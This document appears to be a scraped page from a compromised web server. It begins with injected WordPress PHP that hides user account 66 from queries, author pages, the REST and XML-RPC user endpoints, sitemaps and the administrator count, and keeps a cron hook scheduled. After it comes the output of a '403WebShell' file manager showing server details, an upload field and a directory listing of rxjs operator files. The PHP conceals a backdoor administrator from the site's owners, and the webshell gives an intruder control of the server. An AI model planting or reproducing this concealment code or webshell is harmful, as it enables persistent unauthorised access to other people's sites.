add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / var /www /html /glossar /node_modules /rxjs /src /internal /operators / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
January 08 2026 10:31:35
deploy / www-data
0775
OperatorSubscriber.ts
4.912 KB
January 08 2026 10:31:35
deploy / www-data
0775
audit.ts
3.282 KB
January 08 2026 10:31:35
deploy / www-data
0775
auditTime.ts
2.297 KB
January 08 2026 10:31:35
deploy / www-data
0775
buffer.ts
2.399 KB
January 08 2026 10:31:35
deploy / www-data
0775
bufferCount.ts
3.924 KB
January 08 2026 10:31:35
deploy / www-data
0775
bufferTime.ts
6.201 KB
January 08 2026 10:31:35
deploy / www-data
0775
bufferToggle.ts
3.451 KB
January 08 2026 10:31:35
deploy / www-data
0775
bufferWhen.ts
3.368 KB
January 08 2026 10:31:35
deploy / www-data
0775
catchError.ts
4.395 KB
January 08 2026 10:31:35
deploy / www-data
0775
combineAll.ts
0.179 KB
January 08 2026 10:31:35
deploy / www-data
0775
combineLatest.ts
1.834 KB
January 08 2026 10:31:35
deploy / www-data
0775
combineLatestAll.ts
2.404 KB
January 08 2026 10:31:35
deploy / www-data
0775
combineLatestWith.ts
1.812 KB
January 08 2026 10:31:35
deploy / www-data
0775
concat.ts
0.999 KB
January 08 2026 10:31:35
deploy / www-data
0775
concatAll.ts
2.116 KB
January 08 2026 10:31:35
deploy / www-data
0775
concatMap.ts
3.552 KB
January 08 2026 10:31:35
deploy / www-data
0775
concatMapTo.ts
3.504 KB
January 08 2026 10:31:35
deploy / www-data
0775
concatWith.ts
1.398 KB
January 08 2026 10:31:35
deploy / www-data
0775
connect.ts
3.92 KB
January 08 2026 10:31:35
deploy / www-data
0775
count.ts
2.245 KB
January 08 2026 10:31:35
deploy / www-data
0775
debounce.ts
4.798 KB
January 08 2026 10:31:35
deploy / www-data
0775
debounceTime.ts
4.558 KB
January 08 2026 10:31:35
deploy / www-data
0775
defaultIfEmpty.ts
1.822 KB
January 08 2026 10:31:35
deploy / www-data
0775
delay.ts
2.241 KB
January 08 2026 10:31:35
deploy / www-data
0775
delayWhen.ts
4.594 KB
January 08 2026 10:31:35
deploy / www-data
0775
dematerialize.ts
2.197 KB
January 08 2026 10:31:35
deploy / www-data
0775
distinct.ts
2.912 KB
January 08 2026 10:31:35
deploy / www-data
0775
distinctUntilChanged.ts
6.75 KB
January 08 2026 10:31:35
deploy / www-data
0775
distinctUntilKeyChanged.ts
2.395 KB
January 08 2026 10:31:35
deploy / www-data
0775
elementAt.ts
2.396 KB
January 08 2026 10:31:35
deploy / www-data
0775
endWith.ts
2.508 KB
January 08 2026 10:31:35
deploy / www-data
0775
every.ts
2.395 KB
January 08 2026 10:31:35
deploy / www-data
0775
exhaust.ts
0.152 KB
January 08 2026 10:31:35
deploy / www-data
0775
exhaustAll.ts
1.939 KB
January 08 2026 10:31:35
deploy / www-data
0775
exhaustMap.ts
4.045 KB
January 08 2026 10:31:35
deploy / www-data
0775
expand.ts
3.492 KB
January 08 2026 10:31:35
deploy / www-data
0775
filter.ts
3.45 KB
January 08 2026 10:31:35
deploy / www-data
0775
finalize.ts
2.154 KB
January 08 2026 10:31:35
deploy / www-data
0775
find.ts
3.475 KB
January 08 2026 10:31:35
deploy / www-data
0775
findIndex.ts
2.589 KB
January 08 2026 10:31:35
deploy / www-data
0775
first.ts
3.489 KB
January 08 2026 10:31:35
deploy / www-data
0775
flatMap.ts
0.145 KB
January 08 2026 10:31:35
deploy / www-data
0775
groupBy.ts
11.009 KB
January 08 2026 10:31:35
deploy / www-data
0775
ignoreElements.ts
1.527 KB
January 08 2026 10:31:35
deploy / www-data
0775
isEmpty.ts
2.116 KB
January 08 2026 10:31:35
deploy / www-data
0775
joinAllInternals.ts
1.328 KB
January 08 2026 10:31:35
deploy / www-data
0775
last.ts
3.41 KB
January 08 2026 10:31:35
deploy / www-data
0775
map.ts
2.479 KB
January 08 2026 10:31:35
deploy / www-data
0775
mapTo.ts
1.633 KB
January 08 2026 10:31:35
deploy / www-data
0775
materialize.ts
2.656 KB
January 08 2026 10:31:35
deploy / www-data
0775
max.ts
1.364 KB
January 08 2026 10:31:35
deploy / www-data
0775
merge.ts
1.516 KB
January 08 2026 10:31:35
deploy / www-data
0775
mergeAll.ts
2.342 KB
January 08 2026 10:31:35
deploy / www-data
0775
mergeInternals.ts
5.933 KB
January 08 2026 10:31:35
deploy / www-data
0775
mergeMap.ts
3.662 KB
January 08 2026 10:31:35
deploy / www-data
0775
mergeMapTo.ts
2.72 KB
January 08 2026 10:31:35
deploy / www-data
0775
mergeScan.ts
3.153 KB
January 08 2026 10:31:35
deploy / www-data
0775
mergeWith.ts
1.528 KB
January 08 2026 10:31:35
deploy / www-data
0775
min.ts
1.365 KB
January 08 2026 10:31:35
deploy / www-data
0775
multicast.ts
4.899 KB
January 08 2026 10:31:35
deploy / www-data
0775
observeOn.ts
3.776 KB
January 08 2026 10:31:35
deploy / www-data
0775
onErrorResumeNextWith.ts
4.126 KB
January 08 2026 10:31:35
deploy / www-data
0775
pairwise.ts
1.878 KB
January 08 2026 10:31:35
deploy / www-data
0775
partition.ts
2.708 KB
January 08 2026 10:31:35
deploy / www-data
0775
pluck.ts
4.276 KB
January 08 2026 10:31:35
deploy / www-data
0775
publish.ts
3.986 KB
January 08 2026 10:31:35
deploy / www-data
0775
publishBehavior.ts
1.451 KB
January 08 2026 10:31:35
deploy / www-data
0775
publishLast.ts
2.885 KB
January 08 2026 10:31:35
deploy / www-data
0775
publishReplay.ts
5.201 KB
January 08 2026 10:31:35
deploy / www-data
0775
race.ts
1.124 KB
January 08 2026 10:31:35
deploy / www-data
0775
raceWith.ts
1.317 KB
January 08 2026 10:31:35
deploy / www-data
0775
reduce.ts
2.716 KB
January 08 2026 10:31:35
deploy / www-data
0775
refCount.ts
4.545 KB
January 08 2026 10:31:35
deploy / www-data
0775
repeat.ts
5.275 KB
January 08 2026 10:31:35
deploy / www-data
0775
repeatWhen.ts
4.777 KB
January 08 2026 10:31:35
deploy / www-data
0775
retry.ts
6.383 KB
January 08 2026 10:31:35
deploy / www-data
0775
retryWhen.ts
3.989 KB
January 08 2026 10:31:35
deploy / www-data
0775
sample.ts
2.234 KB
January 08 2026 10:31:35
deploy / www-data
0775
sampleTime.ts
1.859 KB
January 08 2026 10:31:35
deploy / www-data
0775
scan.ts
4.046 KB
January 08 2026 10:31:35
deploy / www-data
0775
scanInternals.ts
2.21 KB
January 08 2026 10:31:35
deploy / www-data
0775
sequenceEqual.ts
5.427 KB
January 08 2026 10:31:35
deploy / www-data
0775
share.ts
11.03 KB
January 08 2026 10:31:35
deploy / www-data
0775
shareReplay.ts
5.965 KB
January 08 2026 10:31:35
deploy / www-data
0775
single.ts
3.971 KB
January 08 2026 10:31:35
deploy / www-data
0775
skip.ts
1.181 KB
January 08 2026 10:31:35
deploy / www-data
0775
skipLast.ts
3.749 KB
January 08 2026 10:31:35
deploy / www-data
0775
skipUntil.ts
2.649 KB
January 08 2026 10:31:35
deploy / www-data
0775
skipWhile.ts
2.341 KB
January 08 2026 10:31:35
deploy / www-data
0775
startWith.ts
2.606 KB
January 08 2026 10:31:35
deploy / www-data
0775
subscribeOn.ts
2.005 KB
January 08 2026 10:31:35
deploy / www-data
0775
switchAll.ts
2.073 KB
January 08 2026 10:31:35
deploy / www-data
0775
switchMap.ts
5.294 KB
January 08 2026 10:31:35
deploy / www-data
0775
switchMapTo.ts
2.953 KB
January 08 2026 10:31:35
deploy / www-data
0775
switchScan.ts
1.889 KB
January 08 2026 10:31:35
deploy / www-data
0775
take.ts
2.23 KB
January 08 2026 10:31:35
deploy / www-data
0775
takeLast.ts
2.93 KB
January 08 2026 10:31:35
deploy / www-data
0775
takeUntil.ts
1.881 KB
January 08 2026 10:31:35
deploy / www-data
0775
takeWhile.ts
2.999 KB
January 08 2026 10:31:35
deploy / www-data
0775
tap.ts
8.356 KB
January 08 2026 10:31:35
deploy / www-data
0775
throttle.ts
5.092 KB
January 08 2026 10:31:35
deploy / www-data
0775
throttleTime.ts
2.375 KB
January 08 2026 10:31:35
deploy / www-data
0775
throwIfEmpty.ts
1.733 KB
January 08 2026 10:31:35
deploy / www-data
0775
timeInterval.ts
2.282 KB
January 08 2026 10:31:35
deploy / www-data
0775
timeout.ts
15.6 KB
January 08 2026 10:31:35
deploy / www-data
0775
timeoutWith.ts
4.524 KB
January 08 2026 10:31:35
deploy / www-data
0775
timestamp.ts
1.593 KB
January 08 2026 10:31:35
deploy / www-data
0775
toArray.ts
1.347 KB
January 08 2026 10:31:35
deploy / www-data
0775
window.ts
3.158 KB
January 08 2026 10:31:35
deploy / www-data
0775
windowCount.ts
4.598 KB
January 08 2026 10:31:35
deploy / www-data
0775
windowTime.ts
7.67 KB
January 08 2026 10:31:35
deploy / www-data
0775
windowToggle.ts
4.326 KB
January 08 2026 10:31:35
deploy / www-data
0775
windowWhen.ts
4.202 KB
January 08 2026 10:31:35
deploy / www-data
0775
withLatestFrom.ts
4.76 KB
January 08 2026 10:31:35
deploy / www-data
0775
zip.ts
1.427 KB
January 08 2026 10:31:35
deploy / www-data
0775
zipAll.ts
0.809 KB
January 08 2026 10:31:35
deploy / www-data
0775
zipWith.ts
1.538 KB
January 08 2026 10:31:35
deploy / www-data
0775
Youez - 2016 - github.com/yon3zuLinuXploit